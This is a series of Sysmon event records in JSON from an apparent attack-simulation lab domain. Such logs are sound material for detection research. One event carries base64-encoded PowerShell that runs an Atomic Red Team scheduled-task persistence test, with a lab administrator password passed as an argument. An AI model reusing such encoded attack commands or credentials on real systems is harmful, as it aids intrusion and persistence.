C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010AA2F0800}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5597,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:17.791\r\nProcessGuid: {E2A3D6B1-11D5-5F25-0000-00101D2C0800}\r\nProcessId: 4804\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\irfs1o1h.dll\r\nCreationUtcTime: 2020-08-01 06:55:17.697","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:17.791","ProcessGuid":"{E2A3D6B1-11D5-5F25-0000-00101D2C0800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\irfs1o1h.dll","CreationUtcTime":"2020-08-01 06:55:17.697","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5598,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.853\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.853","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5599,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.853\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.853","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5600,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.853\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.853","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5601,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.027\r\nProcessGuid: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nProcessId: 4848\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nParentProcessId: 872\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.027","ProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","ParentProcessId":"872","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5602,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nSourceProcessId: 872\r\nSourceThreadId: 2316\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44568890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.025","SourceProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","SourceProcessId":"872","SourceThreadId":"2316","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44568890)","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5603,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 